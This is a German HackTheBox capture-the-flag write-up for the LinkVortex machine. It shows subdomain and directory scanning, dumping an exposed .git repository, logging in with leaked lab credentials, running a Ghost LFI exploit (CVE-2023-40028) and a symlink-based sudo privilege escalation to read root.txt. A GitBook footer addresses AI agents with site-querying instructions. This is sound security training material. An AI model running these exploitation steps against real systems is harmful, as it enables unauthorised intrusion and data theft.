> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-easy/linkvortex-hackthebox-writeup.md).

# LinkVortex HackTheBox Ausarbeitung

{% embed url="<https://app.hackthebox.com/machines/638>" %}

{% hint style="warning" %}
**Fähigkeiten:**

* Subdomain-Aufzählung
* Informationen aus dem .git-Verzeichnis extrahieren (Git-Dumper)
* Informationsleck
* LFI-Ausnutzung (Ghost)
* Missbrauch von Sudo-Berechtigungen per Skript (doppelte symbolische Verknüpfung)
  {% endhint %}

## Aufklärung

**Einrichtung des Arbeitsbereichs:**

Richten Sie den Arbeitsbereich ein, indem Sie drei Ordner erstellen, um wichtige Inhalte, Exploits und Nmap-Aufklärungsergebnisse zu speichern.

<figure><img src="/files/d20279a435a20738f0bba79a709a0db7b209cb6b" alt=""><figcaption></figcaption></figure>

**VPN-Verbindung prüfen**

Prüfen Sie die VPN-Verbindung, um eine stabile Kommunikation mit dem Zielsystem sicherzustellen.

<figure><img src="/files/29bb16690c11ac241ef4b68b7f4f08bec85a121e" alt=""><figcaption></figcaption></figure>

**Konfiguration der Datei /etc/hosts**

Wir fügen die IP-Adresse des Ziels unserer `/etc/hosts` Datei hinzu, um lokale DNS-Auflösungen zu erleichtern.

<figure><img src="/files/367d8aed5c278660ad5412d320d47185f168940b" alt=""><figcaption></figcaption></figure>

**Offene-Ports-Ermittlung mit Nmap:**

Erfassen Sie offene Ports und exportieren Sie die Ergebnisse in die Datei "allPorts" im Nmap-Verzeichnis:

```bash
nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 linkvortex.htb -oG allPorts
```

<figure><img src="/files/ebf807790c9eb1b88b21af9f35de19c753b6dea1" alt=""><figcaption></figcaption></figure>

**Analyse offener Ports mit extractPorts:**

Verwende die Funktion extractPorts, um offene Ports in einem kompakten Format anzuzeigen und sie in die Zwischenablage zu kopieren (22.80)

<figure><img src="/files/0f1d32fce1895dee849a532d9a505fd503f1be23" alt=""><figcaption></figcaption></figure>

### **Port 80**

<figure><img src="/files/cf8cc46c8e3c58cb36149a55010f3f35e652a892" alt=""><figcaption></figcaption></figure>

**Port- und Versionsscan mit Nmap:**

Verwenden Sie Nmap, um die Service-Versionen zu scannen und die Ausgabe in der Datei "targeted" zu speichern:

```bash
nmap -sCV -p22,80 linkvortex.htb -oN targeted
```

<figure><img src="/files/6311940c8f1f5e3f7d090aa605582b259592fbc4" alt=""><figcaption></figcaption></figure>

### **Verzeichnis-Enumeration**

```bash
wfuzz -c -t 100 --hc=404,301 -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt http://linkvortex.htb/FUZZ/
```

<figure><img src="/files/a3eb93949a5e34440f3dedb5f5e793580c6e0bb3" alt=""><figcaption></figcaption></figure>

### Admin-Panel - Ghost

<figure><img src="/files/b72ea209925e01626000ca69eb76a8a364eaadf1" alt=""><figcaption></figcaption></figure>

### **Entdeckung einer Subdomain**

Wir suchen nach Subdomains, die mit `linkvortex.htb` verbunden sind, mit gobuster.

```bash
gobuster vhost -u http://linkvortex.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100
```

Wir finden die Subdomain `dev.linkvortex.htb`. Hier ist der Befehl für diese Suche:

<figure><img src="/files/28a5aa92d9b7bc4e28dfea0ee59a6000d9826c05" alt=""><figcaption></figcaption></figure>

Sobald die Subdomain gefunden wurde, fügen wir sie der `/etc/hosts` Datei für einen einfacheren Zugriff hinzu:

<figure><img src="/files/30934fecf6e3c7b8cf37b5443810ef5cca26fcec" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/0862cca013d33a0c49e868f091a19a705b3e805e" alt=""><figcaption></figcaption></figure>

#### **Suche nach Verzeichnissen in der neuen Subdomain**

Wir suchen nach vorhandenen Verzeichnissen auf der `dev.linkvortex.htb` Subdomain mit `gobuster`:

```bash
gobuster dir -u http://dev.linkvortex.htb/ -w /usr/share/SecLists/Discovery/Web-Content/common.txt -t 100
```

Wir entdecken das `.git` Verzeichnis, was auf ein offengelegtes Git-Repository hindeuten könnte.

<figure><img src="/files/14c18c01d7c9beaf493c402f76d2e15c4792a465" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/266be58b0f2be8979df82a607e2b73990dba6be0" alt=""><figcaption></figcaption></figure>

### **Dateiextraktion mit Git-Dumper**

Wir verwenden das `git-dumper` Werkzeug zum Extrahieren von Dateien aus dem `.git` Verzeichnis und analysieren sie:

```git
git-dumper http://dev.linkvortex.htb/.git .git
```

<figure><img src="/files/e438e894e8805646d1572d5ab59622f98d1637cf" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/d87d3baa5c84e23a223c2652abdc0ca7ad972465" alt=""><figcaption></figcaption></figure>

Dadurch erhalten wir sensible Dateien, einschließlich einer Testdatei unter `ghost/core/test/regression/api/admin/authentication.test.js`, wo wir ein Passwort finden:

<figure><img src="/files/2f222361e65223944dc5c987139f7a7ed6723c29" alt=""><figcaption></figcaption></figure>

**Gefundenes Passwort:**

```parser
OctopiFociPilfer45
```

<figure><img src="/files/0298f3ebaea925abe58339157a0f4ca40ca52eb5" alt=""><figcaption></figcaption></figure>

### **Anmeldung beim Ghost-Admin-Panel**

Mit diesem Passwort versuchen wir, uns beim Ghost-Administrationspanel unter Verwendung der `admin@linkvortex.htb` E-Mail-Adresse anzumelden:

* **E-Mail** : `admin@linkvortex.htb`
* **Passwort**: `OctopiFociPilfer45`

<figure><img src="/files/3c935aeb98c4206e8772e1e347617fee23155537" alt=""><figcaption></figcaption></figure>

## Schwachstelle Ghost - LFI

{% embed url="<https://github.com/0xyassine/CVE-2023-40028>" %}

<figure><img src="/files/91b8a712cac551352659bc97f834ba6f89366ec4" alt=""><figcaption></figcaption></figure>

> Während des Portscans stellten wir fest, dass die verwendete Ghost-Version (v5.58) anfällig für eine LFI-(Local File Inclusion-)Schwachstelle ist, identifiziert als CVE-2023-40028. Um diese Schwachstelle auszunutzen, laden wir das Exploit-Skript herunter und passen die Ziel-URL an, damit sie auf unsere Ghost-Instanz verweist.

<figure><img src="/files/05a7e1d4b3d029ff7164e1dc8ec3fb03aab7d042" alt=""><figcaption></figcaption></figure>

Hier ist der Befehl zum Ausführen des Exploits:

```bash
./LFI.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
```

Anschließend erhalten wir eine Shell und können Dateien anzeigen, wie zum Beispiel `/etc/passwd`.

<figure><img src="/files/c530c9ffcaf7221b8b50dfb7186a0454cec93665" alt=""><figcaption></figcaption></figure>

**Zugriff auf eine interne Route via LFI**

In dem `.git` Verzeichnis haben wir eine Docker-Datei entdeckt, die uns einen internen Pfad zum Zugriff auf eine Sitzung bietet: `/var/lib/ghost/config.production.json`.

<figure><img src="/files/c9477ad23452609b9b00511c56626f14e1d02c56" alt=""><figcaption></figcaption></figure>

Wir verwenden LFI, um Dateien aufzulisten und die Zugangsdaten eines Benutzers namens Bob zu finden:

<figure><img src="/files/374a3adf2d51cb36813659676a7bbc599b779698" alt=""><figcaption></figcaption></figure>

**Bobs Zugangsdaten:**

* **Benutzer**: `bob@linkvortex.htb`
* **Passwort**: `fibber-talented-worth`

Wir verbinden uns per SSH mit der Zielmaschine unter Verwendung von Bobs Zugangsdaten:

### Flagge user.txt :)

Wir verwenden das Passwort `fibber-talented-worth` zum Anmelden und greifen auf die Datei `user.txt`, wo wir die Flagge finden.

<figure><img src="/files/fb7670b179010d5d060bd2665d2c362adceb31c5" alt=""><figcaption></figcaption></figure>

## Flag root.txt :)

### SUDO - Clean/\_synLink.sh

Wir suchen nach einer Schwachstelle, die eine Rechteausweitung ermöglicht. Wir entdecken eine Datei mit SUID-Berechtigungen.

<figure><img src="/files/9eeece112eb8e54afa00c1410859403bf25574eb" alt=""><figcaption></figcaption></figure>

#### **Analyse des Symlink-Bereinigungs-Skripts**

> Wir analysieren ein Skript namens `clean_symlink.sh`, das prüft, ob die als Argument übergebene Datei ein Symlink ist, der auf eine `.png` Datei zeigt. Wenn der Symlink auf eine kritische Datei verweist, löscht das Skript ihn. Andernfalls verschiebt es den Symlink in das `/var/quarantined/` Verzeichnis. Wenn die `CHECK_CONTENT` Umgebungsvariable auf `true`, versucht das Skript, den Inhalt der Datei zu lesen.

Hier ist der Befehl zum Erstellen der für die Ausnutzung erforderlichen Symlinks:

```bash
ln -s /root/root.txt flag.txt
ln -s /home/bob/flag.txt flag.png
```

Dann führen wir das Skript mit dem folgenden Befehl aus, um die Root-Flagge zu erhalten:

```bash
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/flag.png 
```

Wir erhalten damit die `root.txt` Flagge.

<figure><img src="/files/1bf8300588e415a9c04519910968b56feb40b708" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/e55cb307f8490e8c0bca47c7098642cf6c42e192" alt="" width="524"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/writeups-ctf/hackthebox/linux-easy/linkvortex-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
